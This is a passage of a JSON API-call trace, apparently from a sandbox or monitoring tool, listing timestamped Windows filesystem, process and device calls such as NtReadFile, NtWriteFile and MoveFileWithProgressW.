"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,350", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,350", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:42:01,350", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,350", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,350", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,360", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,360", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,370", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,370", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:01,370", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,380", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,380", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,390", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,390", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,400", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,410", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,410", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,420", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,420", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,420", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,420", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,420", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,420", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,430", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,430", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,430", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,430", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:01,430", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,440", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,440", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,451", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,451", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,461", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,461", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,471", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,481", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:01,481", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,481", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,481", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,481", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,481", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,481", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,491", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,491", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,501", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,501", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,501", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,501", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,501", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,511", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,511", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,511", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:01,511", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,511", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,521", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,521", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,531", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,531", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,541", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,541", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,541", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,541", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:01,541", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,551", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,551", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,551", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,551", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,551", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,561", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,561", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,571", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,581", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,581", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,581", "api": 
"MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,581", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,591", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,591", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,591", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,591", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,591", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,591", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,601", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtCreateFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:01,601", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,611", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,621", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtWriteFile"}, {"category": "device", "timestamp": "2016-02-16 
17:42:01,631", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,631", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,641", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,651", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,661", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,661", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,661", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,671", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,671", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,671", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,671", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,671", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,681", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,691", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,701", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,701", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,701", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,711", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:01,711", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,711", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,711", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,711", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,721", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,721", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,721", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,731", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,731", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,741", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,751", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,771", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,771", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,781", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:01,781", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,791", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,801", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,811", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,811", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:01,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,811", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,811", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,821", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,821", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,821", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,831", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,831", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,831", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,831", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,841", "api": "NtFreeVirtualMemory"}, {"category": 